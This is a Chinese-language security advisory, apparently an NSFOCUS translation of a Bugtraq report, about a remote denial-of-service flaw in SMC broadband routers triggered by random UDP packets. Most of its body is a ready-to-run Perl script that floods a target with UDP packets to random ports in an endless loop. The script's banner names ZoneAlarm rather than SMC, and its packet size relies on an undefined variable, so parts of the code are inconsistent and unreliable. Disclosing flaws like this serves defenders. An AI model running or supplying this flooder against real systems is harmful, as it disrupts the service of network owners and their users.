安全研究

安全漏洞
SMC Router随机UDP包远程拒绝服务攻击漏洞

发布日期:2003-09-26
更新日期:2003-10-08

受影响系统:
SMC SMC7004VWBR 1.23
SMC SMC7004VWBR 1.22
SMC SMC7004VWBR 1.21a
SMC SMC2404WBR
描述:
BUGTRAQ  ID: 8711

SMC2404WBR是一款无线CABLE/DSL宽带路由器。

SMC路由器不能正确处理随机发送的UDP包端口扫描,远程攻击者可以利用这个漏洞对路由器进行拒绝服务攻击。

发送随机UDP包到路由器上的0-65000端口,可引起路由器挂起,停止对正常服务的响应。

<*来源:res076cf (res076cf@alltel.net
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106458229620587&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

res076cf (res076cf@alltel.net)提供了如下测试方法:

#!/usr/bin/perl
use Socket;

system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
   &usage
}

my ($target);
$target=$ARGV[0];

my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");

socket(DoS, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$target");

print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";

for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}

建议:
厂商补丁:

SMC
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.smc.com/

浏览次数:2817
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障